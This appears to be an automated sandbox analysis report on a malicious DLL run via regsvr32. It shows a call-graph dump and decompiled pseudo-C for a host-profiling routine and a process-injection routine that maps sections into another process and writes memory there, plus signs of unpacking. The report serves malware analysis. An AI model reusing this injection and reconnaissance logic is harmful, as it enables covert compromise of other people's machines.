1000f87e 12398->12405 12400 100085d5 2 API calls 12399->12400 12401 1000f868 12400->12401 12407 10009f2f 12401->12407 12404 1000861a 2 API calls 12404->12405 12405->12135 12406->12388 12410 10009f06 12407->12410 12411 1000a0ab 4 API calls 12410->12411 12412 10009f2a 12411->12412 12412->12404 12413->12141 12438 10008604 HeapAlloc 12414->12438 12416 100061ef 12417 10006360 12416->12417 12439 10008604 HeapAlloc 12416->12439 12417->11659 12419 1000626f 12420 1000861a 2 API calls 12419->12420 12421 10006352 12420->12421 12422 1000861a 2 API calls 12421->12422 12422->12417 12423 1000628d memset memset 12424 10006209 12423->12424 12424->12417 12424->12419 12424->12423 12425 1000b1b1 10 API calls 12424->12425 12425->12424 12427 10009f95 3 API calls 12426->12427 12429 10009e87 12427->12429 12428 10009e9e 12428->11674 12431 10008604 HeapAlloc 12428->12431 12429->12428 12430 1000861a 2 API calls 12429->12430 12430->12428 12431->11664 12433 1000a245 12432->12433 12434 10009b0e HeapAlloc 12433->12434 12436 1000a275 12434->12436 12435 1000a2da 12435->11671 12436->12435 12437 1000861a 2 API calls 12436->12437 12437->12435 12438->12416 12439->12424 12441 10009e66 3 API calls 12440->12441 12442 10005642 12441->12442 12443 1000980c GetSystemTimeAsFileTime 12442->12443 12445 100056c0 12442->12445 12444 1000565b 12443->12444 12446 10009f06 4 API calls 12444->12446 12445->11312 12447 1000566f 12446->12447 12448 10009f06 4 API calls 12447->12448 12449 10005685 12448->12449 12476 1000e4c1 12449->12476 12452 1000a86d 5 API calls 12453 100056a4 12452->12453 12453->12445 12454 100056e9 12453->12454 12483 10008604 HeapAlloc 12453->12483 12484 1000153b CreateMutexA 12454->12484 12457 10005707 12499 100098ee 12457->12499 12459 10005715 12511 10003017 12459->12511 12467 10005758 12560 10003d34 12467->12560 12469 1000980c GetSystemTimeAsFileTime 12471 1000572b 12469->12471 12471->12467 12471->12469 12552 1000279b 12471->12552 12477 1000e1bc 6 API calls 12476->12477 12478 1000e4d3 12477->12478 12479 1000e1bc 6 API calls 12478->12479 12480 1000e4ec 12479->12480 12576 1000e450 12480->12576 12482 1000568d 12482->12452 12483->12454 12485 10001558 CreateMutexA 12484->12485 12495 100015ad 12484->12495 12486 1000156e 12485->12486 12485->12495 12487 10001080 HeapAlloc 12486->12487 12488 10001578 12487->12488 12489 100091a6 HeapAlloc 12488->12489 12488->12495 12490 1000158c 12489->12490 12491 100085c2 2 API calls 12490->12491 12492 10001599 12491->12492 12590 10008604 HeapAlloc 12492->12590 12494 100015a3 12494->12495 12591 10008604 HeapAlloc 12494->12591 12495->12457 12497 100015c4 12497->12495 12498 1000e1bc 6 API calls 12497->12498 12498->12495 12500 1000990c 12499->12500 12501 1000996c 12500->12501 12509 10009910 12500->12509 12592 1000984a 12500->12592 12506 1000997d 12501->12506 12596 10008604 HeapAlloc 12501->12596 12503 1000a471 2 API calls 12505 100099e2 12503->12505 12507 10009a56 SetThreadPriority 12505->12507 12508 10009a1f 12505->12508 12506->12503 12506->12509 12507->12509 12508->12509 12510 1000861a 2 API calls 12508->12510 12509->12459 12510->12509 12512 10003025 12511->12512 12514 1000302a 12511->12514 12597 1000bb20 12512->12597 12515 100031c2 12514->12515 12516 1000c292 6 API calls 12515->12516 12517 100031dd 12516->12517 12518 100031e6 12517->12518 12604 10008604 HeapAlloc 12517->12604 12528 100029b1 12518->12528 12520 100031fa 12521 10003204 12520->12521 12605 1000bd10 12520->12605 12523 1000861a 2 API calls 12521->12523 12523->12518 12527 100098ee 6 API calls 12527->12521 12529 10009e66 3 API calls 12528->12529 12530 100029cf 12529->12530 12614 100028fb 12530->12614 12533 100028fb 3 API calls 12534 100029f8 12533->12534 12618 10009ea5 12534->12618 12537 10002a4c 12545 10003bb2 12537->12545 12538 100093be HeapAlloc 12539 10002a1b 12538->12539 12540 10002a37 12539->12540 12621 10002a53 12539->12621 12542 100094b7 2 API calls 12540->12542 12543 10002a42 12542->12543 12544 1000861a 2 API calls 12543->12544 12544->12537 12629 10004145 12545->12629 12547 10003c42 12668 10003821 12547->12668 12550 10003be0 12550->12471 12551 10003bd5 12551->12547 12551->12550 12649 100038f9 12551->12649 12553 100028b3 12552->12553 12557 100027d3 12552->12557 12553->12471 12554 100028aa 12554->12553 12716 10002aea 12554->12716 12557->12553 12557->12554 12558 1000980c GetSystemTimeAsFileTime 12557->12558 12711 10009e1f 12557->12711 12726 10001da0 12557->12726 12558->12557 12565 10003d42 12560->12565 12561 10003d72 12562 1000861a 2 API calls 12561->12562 12564 10003d85 12562->12564 12566 10009a8e 12564->12566 12565->12561 12731 10003c54 12565->12731 12567 10009a94 12566->12567 12568 10009aea 12567->12568 12571 1000984a 2 API calls 12567->12571 12569 1000861a 2 API calls 12568->12569 12570 10005762 12569->12570 12572 100034cb 12570->12572 12571->12567 12574 100034d4 12572->12574 12573 100034f9 12573->12445 12574->12573 12575 1000861a 2 API calls 12574->12575 12575->12573 12577 1000e49a 12576->12577 12578 1000e45e 12576->12578 12580 100095c7 HeapAlloc 12577->12580 12589 10008604 HeapAlloc 12578->12589 12581 1000e4a4 12580->12581 12583 100091a6 HeapAlloc 12581->12583 12582 1000e46f 12586 1000e4bd 12582->12586 12587 1000861a 2 API calls 12582->12587 12584 1000e4b0 12583->12584 12585 100085c2 2 API calls 12584->12585 12585->12586 12586->12482 12588 1000e493 12587->12588 12588->12482 12589->12582 12590->12494 12591->12497 12593 10009854 12592->12593 12594 1000861a 2 API calls 12593->12594 12595 10009879 12593->12595 12594->12595 12595->12500 12596->12506 12598 1000bb37 12597->12598 12599 1000bb56 12598->12599 12600 100095e1 HeapAlloc 12598->12600 12599->12514 12601 1000bb65 lstrcmpiW 12600->12601 12602 1000bb7b 12601->12602 12603 100085d5 2 API calls 12602->12603 12603->12599 12604->12520 12608 1000bd5e 12605->12608 12606 10003210 12606->12521 12609 1000bc7a 12606->12609 12607 1000bdfe LocalAlloc 12607->12606 12608->12606 12608->12607 12610 100095e1 HeapAlloc 12609->12610 12613 1000bca0 12610->12613 12611 100085d5 2 API calls 12612 10003268 12611->12612 12612->12527 12613->12611 12615 1000291c 12614->12615 12616 10002905 12614->12616 12615->12533 12617 10008698 3 API calls 12616->12617 12617->12615 12619 10009f95 3 API calls 12618->12619 12620 10002a03 12619->12620 12620->12537 12620->12538 12622 10002a5f 12621->12622 12623 10002a65 12622->12623 12624 10002a6a atol 12622->12624 12623->12539 12625 10002a81 12624->12625 12625->12623 12626 10009749 2 API calls 12625->12626 12627 10002a97 12626->12627 12628 10009749 2 API calls 12627->12628 12628->12623 12674 1000378c 12629->12674 12632 1000896f 4 API calls 12633 1000418c 12632->12633 12634 10008a90 3 API calls 12633->12634 12637 10004197 12633->12637 12635 100041b3 12634->12635 12635->12637 12680 10008604 HeapAlloc 12635->12680 12636 10004397 12640 1000861a 2 API calls 12636->12640 12637->12636 12639 10008cc0 4 API calls 12637->12639 12639->12636 12641 100043a2 12640->12641 12641->12551 12642 10004356 12642->12637 12644 1000861a 2 API calls 12642->12644 12643 100093be HeapAlloc 12647 10004201 12643->12647 12644->12637 12645 10009749 SetLastError SetLastError 12645->12647 12646 10008669 HeapAlloc 12646->12647 12647->12637 12647->12642 12647->12643 12647->12645 12647->12646 12648 100094b7 HeapFree memset 12647->12648 12648->12647 12650 10003913 12649->12650 12684 1000b4a3 12650->12684 12653 1000c8fd 3 API calls 12657 1000395c 12653->12657 12654 1000861a 2 API calls 12655 10003bab 12654->12655 12655->12551 12656 1000392d 12656->12654 12657->12656 12663 1000cb77 27 API calls 12657->12663 12665 10003a72 12657->12665 12667 10003a7a 12657->12667 12690 1000ae66 memset CreateProcessW 12657->12690 12659 10003ab6 12661 1000861a 2 API calls 12659->12661 12660 1000861a 2 API calls 12660->12667 12662 10003ac6 12661->12662 12662->12656 12664 10008698 3 API calls 12662->12664 12663->12657 12664->12656 12691 10003892 12665->12691 12667->12659 12667->12660 12673 10003832 12668->12673 12669 10003873 12670 1000861a 2 API calls 12669->12670 12672 10003888 12670->12672 12671 1000861a 2 API calls 12671->12673 12672->12550 12673->12669 12673->12671 12675 100037b6 12674->12675 12681 100090a5 12675->12681 12678 100092e5 2 API calls 12679 10003816 12678->12679 12679->12632 12680->12647 12682 1000902d _ftol2_sse 12681->12682 12683 100037ea 12682->12683 12683->12678 12685 1000b4b9 12684->12685 12698 10008604 HeapAlloc 12685->12698 12687 1000b4c4 12688 10003924 12687->12688 12689 1000b578 memcpy 12687->12689 12688->12653 12688->12656 12689->12687 12690->12657 12699 1000921a 12691->12699 12695 100038c8 12696 1000861a 2 API calls 12695->12696 12697 100038da 12696->12697 12697->12667 12698->12687 12700 100038b0 GetProcessId 12699->12700 12701 10009223 12699->12701 12705 1000a8be 12700->12705 12710 10008604 HeapAlloc 12701->12710 12703 10009234 12703->12700 12704 1000923b WideCharToMultiByte 12703->12704 12704->12700 12706 10009601 2 API calls 12705->12706 12707 1000a8e4 12706->12707 12708 1000a8f0 CharUpperBuffA 12707->12708 12709 1000a90e 12708->12709 12709->12695 12710->12703 12712 10009f95 3 API calls 12711->12712 12713 10009e42 12712->12713 12714 1000861a 2 API calls 12713->12714 12715 10009e5c 12713->12715 12714->12715 12715->12557 12730 10008604 HeapAlloc 12716->12730 12718 10002b81 12719 10009f48 4 API calls 12718->12719 12721 10002b90 12719->12721 12720 10002b05 12720->12718 12722 10002b37 lstrcatA 12720->12722 12724 10009601 2 API calls 12720->12724 12725 10002b0f 12720->12725 12723 1000861a 2 API calls 12721->12723 12722->12720 12723->12725 12724->12720 12725->12553 12727 10001db7 12726->12727 12729 10001de0 12726->12729 12728 100098ee 6 API calls 12727->12728 12727->12729 12728->12729 12729->12557 12730->12720 12732 10009601 2 API calls 12731->12732 12733 10003c79 12732->12733 12733->12565 12734->11323 12735->11326 12736 10005e96 12737 10005ea6 ExitProcess 12736->12737 12738 10077380 12740 1007738a 12738->12740 12741 100773ab 12740->12741 12743 1007792e 12741->12743 12744 10077973 12743->12744 12745 10077a0f VirtualAlloc 12744->12745 12746 100779d1 VirtualAlloc 12744->12746 12747 10077a55 12745->12747 12746->12745 12748 10077a6e VirtualAlloc 12747->12748 12763 100775dd 12748->12763 12751 10077ba8 VirtualProtect 12752 10077bc7 12751->12752 12755 10077bfa 12751->12755 12754 10077bd5 VirtualProtect 12752->12754 12752->12755 12753 10077ad7 12753->12751 12754->12752 12756 10077c7c VirtualProtect 12755->12756 12757 10077cb7 VirtualProtect 12756->12757 12759 10077d14 VirtualFree GetPEB 12757->12759 12760 10077d40 12759->12760 12765 1007785d GetPEB 12760->12765 12762 10077d84 12764 100775ec VirtualFree 12763->12764 12764->12753 12766 1007788d 12765->12766 12766->12762

                  Executed Functions

                  Function 1000D01F, Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 282COMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 91%
                  			E1000D01F(void* __fp0) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				short _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				void** _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				intOrPtr _t111;
				long _t115;
				signed int _t117;
				long _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				long _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x1001e69c; // 0x10000000
				_t81 = E10008604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x1001e684; // 0x2c2faa0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E1000BA05(); // executed
				 *(_t222 + 0x110) = _t88;
				_t178 =  *_t88;
				if(E1000BB8D( *_t88) == 0) {
					_t90 = E1000BA62(_t178, _t222); // executed
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220, executed
				_t91 = E1000E3F1(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
				_t92 = E1000E3B6(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
				 *(_t222 + 0x224) = _t162;
				_v12 = 0x80;
				_v8 = 0x100;
				_t22 = _t222 + 0x114; // 0x114
				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
					GetLastError();
				}
				_t97 =  *0x1001e694; // 0x2c2fbf8
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114, executed
				_t103 = E1000B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E1000B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E10008FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E1000B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess(); // executed
				_t111 = E1000BBDF(_t110); // executed
				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x1001e684; // 0x2c2faa0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E100095E1(_t199, 0x10c);
				_t200 =  *0x1001e684; // 0x2c2faa0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x1001e684; // 0x2c2faa0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E100085D5( &_v8);
				_t124 =  *0x1001e684; // 0x2c2faa0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E10009640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x1001e684; // 0x2c2faa0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x1001e684; // 0x2c2faa0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x1001e684; // 0x2c2faa0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x1001e684; // 0x2c2faa0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x1001e684; // 0x2c2faa0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x1001e684; // 0x2c2faa0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E100122D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
				_t145 = E1000CD33(_t79); // executed
				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
				return _t222;
			}






















































                  0x1000d01f
                  0x1000d029
                  0x1000d035
                  0x1000d03a
                  0x1000d03f
                  0x1000d3ff
                  0x1000d3ff
                  0x1000d04c
                  0x1000d052
                  0x1000d057
                  0x1000d05d
                  0x1000d06d
                  0x1000d079
                  0x1000d079
                  0x1000d082
                  0x1000d088
                  0x1000d08a
                  0x1000d093
                  0x1000d093
                  0x1000d09f
                  0x1000d0a3
                  0x1000d0a8
                  0x1000d0ae
                  0x1000d0b7
                  0x1000d0c5
                  0x1000d0cc
                  0x1000d0d1
                  0x1000d0d1
                  0x1000d0d2
                  0x1000d0b9
                  0x1000d0b9
                  0x1000d0b9
                  0x1000d0d8
                  0x1000d0de
                  0x1000d0e3
                  0x1000d0e9
                  0x1000d0f1
                  0x1000d0fb
                  0x1000d108
                  0x1000d113
                  0x1000d11b
                  0x1000d13c
                  0x1000d13e
                  0x1000d13e
                  0x1000d140
                  0x1000d14a
                  0x1000d156
                  0x1000d166
                  0x1000d16c
                  0x1000d172
                  0x1000d174
                  0x1000d185
                  0x1000d18b
                  0x1000d191
                  0x1000d196
                  0x1000d19c
                  0x1000d1a2
                  0x1000d1a7
                  0x1000d1ac
                  0x1000d1ac
                  0x1000d1b2
                  0x1000d1b2
                  0x1000d1bb
                  0x1000d1c7
                  0x1000d1cf
                  0x1000d1d3
                  0x1000d1d3
                  0x1000d1cf
                  0x1000d1d7
                  0x1000d1dd
                  0x1000d1e3
                  0x1000d1ea
                  0x1000d1fb
                  0x1000d201
                  0x1000d209
                  0x1000d210
                  0x1000d212
                  0x1000d223
                  0x1000d229
                  0x1000d22e
                  0x1000d231
                  0x1000d234
                  0x1000d23a
                  0x1000d240
                  0x1000d242
                  0x1000d248
                  0x1000d251
                  0x1000d254
                  0x1000d254
                  0x1000d257
                  0x1000d25f
                  0x1000d26a
                  0x1000d270
                  0x1000d261
                  0x1000d263
                  0x1000d263
                  0x1000d279
                  0x1000d279
                  0x1000d27f
                  0x1000d287
                  0x1000d292
                  0x1000d297
                  0x1000d29d
                  0x1000d29f
                  0x1000d2ac
                  0x1000d2ad
                  0x1000d2ae
                  0x1000d2b9
                  0x1000d2bb
                  0x1000d2c2
                  0x1000d2c2
                  0x1000d2cc
                  0x1000d2d1
                  0x1000d2d6
                  0x1000d2d6
                  0x1000d2dc
                  0x1000d2e3
                  0x1000d2e4
                  0x1000d2f1
                  0x1000d304
                  0x1000d309
                  0x1000d30e
                  0x1000d317
                  0x1000d317
                  0x1000d31d
                  0x1000d322
                  0x1000d328
                  0x1000d32e
                  0x1000d333
                  0x1000d33c
                  0x1000d33e
                  0x1000d345
                  0x1000d345
                  0x1000d34b
                  0x1000d353
                  0x1000d358
                  0x1000d359
                  0x1000d35e
                  0x1000d367
                  0x1000d369
                  0x1000d374
                  0x1000d374
                  0x1000d37d
                  0x1000d385
                  0x1000d38c
                  0x1000d391
                  0x1000d3a0
                  0x1000d3b8
                  0x1000d3bf
                  0x1000d3cd
                  0x1000d3df
                  0x1000d3e6
                  0x1000d3ee
                  0x1000d3f3
                  0x00000000

                  APIs
                    • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                  • GetCurrentProcessId.KERNEL32 ref: 1000D046
                  • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
                  • GetCurrentProcess.KERNEL32 ref: 1000D09F
                  • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
                  • GetLastError.KERNEL32 ref: 1000D13E
                  • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
                  • GetLastError.KERNEL32 ref: 1000D172
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
                  • GetCurrentProcess.KERNEL32 ref: 1000D20E
                    • Part of subcall function 1000BA62: CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
                  • memset.MSVCRT ref: 1000D229
                  • GetVersionExA.KERNEL32(00000000), ref: 1000D234
                  • GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
                  • IsWow64Process.KERNEL32(00000000), ref: 1000D251
                  • GetSystemInfo.KERNEL32(?), ref: 1000D26A
                  • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: Process$Current$ErrorFileLastModuleName$AccountAllocByteCharCloseDirectoryHandleHeapInfoLookupMultiSystemVersionWideWindowsWow64memset
                  • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                  • API String ID: 2155830292-2706916422
                  • Opcode ID: b5dd94d2bbba0da44d3b5b8615bbbb5f356fccea26f3f649cc03eb97a5baf4da
                  • Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
                  • Opcode Fuzzy Hash: b5dd94d2bbba0da44d3b5b8615bbbb5f356fccea26f3f649cc03eb97a5baf4da
                  • Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000C6C0, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200nativeregistrymemoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 86%
                  			E1000C6C0(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* _t69;
				intOrPtr _t75;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct _EXCEPTION_RECORD _t116;
				void* _t126;
				void* _t131;
				intOrPtr _t134;
				void* _t140;
				void* _t141;

				_t69 =  *0x1001e688; // 0x2bb0590
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E1000E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x1001e780; // 0x2c2fbc8
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						NtClose(_v16);
					}
					return _v8;
				}
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
					if(_t106 != 0) {
						DestroyWindow(_t106); // executed
						UnregisterClassA( &_v56, 0);
					}
				}
				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_t126 = _v20;
					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
						goto L12;
					}
					_t140 = E10008669( *0x1001e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E1000861A( &_v32, 0x1ac4);
					_t141 =  *0x1001e688; // 0x2bb0590
					 *0x1001e688 = _t131;
					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E1000C63F(_v12, _v8, _v36);
					 *0x1001e688 = _t141;
					goto L14;
				}
			}


























                  0x1000c6c6
                  0x1000c6cd
                  0x1000c6cf
                  0x1000c6d1
                  0x1000c6d3
                  0x1000c6d6
                  0x1000c6d9
                  0x1000c6dc
                  0x1000c6df
                  0x1000c6e2
                  0x1000c6e5
                  0x1000c6ef
                  0x1000c6f2
                  0x1000c6f9
                  0x1000c6fe
                  0x1000c6fe
                  0x1000c704
                  0x1000c706
                  0x1000c70f
                  0x1000c8b5
                  0x1000c8b9
                  0x1000c8be
                  0x1000c8c4
                  0x1000c8c7
                  0x1000c8c7
                  0x1000c8cb
                  0x1000c8d0
                  0x1000c8e2
                  0x1000c8e2
                  0x1000c8eb
                  0x1000c8f5
                  0x1000c8f5
                  0x1000c8fc
                  0x1000c8fc
                  0x1000c71e
                  0x1000c738
                  0x00000000
                  0x00000000
                  0x1000c743
                  0x1000c74d
                  0x1000c757
                  0x1000c75a
                  0x1000c760
                  0x1000c767
                  0x1000c768
                  0x1000c769
                  0x1000c772
                  0x1000c773
                  0x1000c774
                  0x1000c776
                  0x1000c779
                  0x1000c77c
                  0x1000c77f
                  0x1000c782
                  0x1000c78e
                  0x1000c7b0
                  0x1000c7b8
                  0x1000c7bb
                  0x1000c7c6
                  0x1000c7c6
                  0x1000c7b8
                  0x1000c7f1
                  0x1000c8b2
                  0x00000000
                  0x1000c7f7
                  0x1000c803
                  0x1000c818
                  0x00000000
                  0x00000000
                  0x1000c82e
                  0x1000c830
                  0x1000c837
                  0x00000000
                  0x00000000
                  0x1000c848
                  0x1000c85f
                  0x1000c86f
                  0x1000c87b
                  0x1000c880
                  0x1000c886
                  0x1000c896
                  0x1000c8a2
                  0x1000c8aa
                  0x00000000
                  0x1000c8aa

                  APIs
                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                  • RegisterClassExA.USER32 ref: 1000C785
                  • CreateWindowExA.USER32 ref: 1000C7B0
                  • DestroyWindow.USER32 ref: 1000C7BB
                  • UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
